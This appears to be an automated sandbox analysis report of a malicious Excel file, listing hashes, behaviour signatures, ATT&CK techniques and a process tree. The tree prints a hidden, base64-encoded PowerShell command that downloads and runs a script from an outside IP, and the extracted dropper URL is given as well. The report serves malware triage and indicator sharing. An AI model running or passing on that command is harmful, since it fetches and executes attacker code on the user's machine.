Analysis

  • max time kernel
    139s
  • max time network
    74s
  • platform
    windows7_x64
  • resource
    win7-20220901-en
  • resource tags

    arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
  • submitted
    03-12-2022 01:10

General

  • Target

    TRUE_doc.xls

  • Size

    38KB

  • MD5

    6b77a4c21a8ef90057c12cd41aa8fa51

  • SHA1

    82d0a47baa5e7a44a28315739a4a517a56ca3942

  • SHA256

    c19c1e39b5f614db3380b72dfb98fbe25ef4ed77bf3ac52055a1239a31a42519

  • SHA512

    6c42cb9f7be0df0dc45c2fcb6a335696c7bb05f03a8521c155b50bf32421256155e98df1832d7b26959ab2c3fac2085405d2d06d43fd79d777e527029299c974

  • SSDEEP

    768:glknKpbdrHYrMue8q7QPX+5xtekEd/68/dgALAoW8NFdU5PX+SSL0LHVfDM:gluKpbdrHYrMue8q7QPX+5xtekEdi8/V

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://78.85.17.88:8912/rev.ps1

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\TRUE_doc.xls
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1768
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powERShEll.eXe -nop -w hiDDen -e cwBlAHQALQBhAGwAaQBhAHMAIAAtAG4AYQBtAGUAIAB0AGUAcwB0ACAALQB2AGEAbAB1AGUAIABJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AOwB0AGUAcwB0ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA3ADgALgA4ADUALgAxADcALgA4ADgAOgA4ADkAMQAyAC8AcgBlAHYALgBwAHMAMQAnACkA
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1556
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powERShEll.eXe -nop -w hiDDen -e cwBlAHQALQBhAGwAaQBhAHMAIAAtAG4AYQBtAGUAIAB0AGUAcwB0ACAALQB2AGEAbAB1AGUAIABJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AOwB0AGUAcwB0ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA3ADgALgA4ADUALgAxADcALgA4ADgAOgA4ADkAMQAyAC8AcgBlAHYALgBwAHMAMQAnACkA
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1200
  • C:\Windows\explorer.exe
    "C:\Windows\explorer.exe"
    1⤵
      PID:1104
    • C:\Windows\system32\AUDIODG.EXE
      C:\Windows\system32\AUDIODG.EXE 0xc8
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:672
    • C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      1⤵
        PID:1764

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Defense Evasion

      Modify Registry

      1
      T1112

      Discovery

      Query Registry

      1
      T1012

      System Information Discovery

      1
      T1082

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/1104-66-0x000007FEFC591000-0x000007FEFC593000-memory.dmp
        Filesize

        8KB

      • memory/1200-68-0x000000006C460000-0x000000006CA0B000-memory.dmp
        Filesize

        5.7MB

      • memory/1200-67-0x000000006C460000-0x000000006CA0B000-memory.dmp
        Filesize

        5.7MB

      • memory/1200-65-0x000000006C460000-0x000000006CA0B000-memory.dmp
        Filesize

        5.7MB

      • memory/1200-61-0x0000000000000000-mapping.dmp
      • memory/1556-60-0x0000000000000000-mapping.dmp
      • memory/1768-57-0x0000000072BCD000-0x0000000072BD8000-memory.dmp
        Filesize

        44KB

      • memory/1768-59-0x0000000072BCD000-0x0000000072BD8000-memory.dmp
        Filesize

        44KB

      • memory/1768-63-0x000000005FFF0000-0x0000000060000000-memory.dmp
        Filesize

        64KB

      • memory/1768-64-0x0000000072BCD000-0x0000000072BD8000-memory.dmp
        Filesize

        44KB

      • memory/1768-58-0x0000000076961000-0x0000000076963000-memory.dmp
        Filesize

        8KB

      • memory/1768-54-0x000000002FC71000-0x000000002FC74000-memory.dmp
        Filesize

        12KB

      • memory/1768-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
        Filesize

        64KB

      • memory/1768-55-0x0000000071BE1000-0x0000000071BE3000-memory.dmp
        Filesize

        8KB